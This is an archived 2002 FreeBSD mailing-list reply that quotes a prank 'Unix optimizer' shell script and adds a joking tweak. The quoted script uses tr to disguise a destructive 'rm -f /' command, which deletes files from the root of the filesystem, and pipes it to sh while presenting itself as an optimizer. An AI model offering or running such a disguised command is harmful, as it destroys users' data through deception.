Date: Thu, 29 Aug 2002 09:24:12 -0700 From: Juli Mallett <jmallett@FreeBSD.org> To: Koul-Henning Pamp <koul@canadamail.de> Cc: chat@freebsd.org Subject: Re: *nixopt, an idea Message-ID: <20020829092411.A89757@FreeBSD.org> In-Reply-To: <20020829150200.B00523962@sitemail.everyone.net>; from koul@canadamail.de on Thu, Aug 29, 2002 at 08:02:00AM -0700 References: <20020829150200.B00523962@sitemail.everyone.net>
next in thread | previous in thread | raw e-mail | index | archive | help
* De: Koul-Henning Pamp <koul@canadamail.de> [ Data: 2002-08-29 ] B [ Subjecte: *nixopt, an idea ] > Fellow hackers, > > I'm creating a new unix optimizer tool, I've finished version 0.1 and need feedback. > > -------------- > #!/bin/sh > # The *nix optimizer > # (C) 2002 Koul-Henning Pamp > # Released under the superior FFL (Fuck Fumerola License) > > [ "`uname`" = "Linux" ] && echo "System not supported yet." > [ "`uname`" = "FreeBSD" ] && echo "df -h /" | tr '\144\146' '\162\155' | tr 'h' 'f'|sh > -------------- You missed the '| sed s\|$\|r\|' in there. > > Thank you. > > _____________________________________________________________ > Die kostenlose WebMail fuer alle Canada-Freunde - www.canadamail.de > Ein Service von CDN.de - Die KANADA-Suchmaschine - www.CDN.de > ------------------------------------------------------------------------ > KanadischerWein.de - Ihr Spezialist für kanadischen Wein im Internet - Besuchen Sie unseren Online-Shop - www.KanadischerWein.de > ------------------------------------------------------------------------ > > _____________________________________________________________ > Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net http://www.everyone.net/?btn=tag > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-chat" in the body of the message > -- Juli Mallett <jmallett@FreeBSD.org> | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-chat" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020829092411.A89757>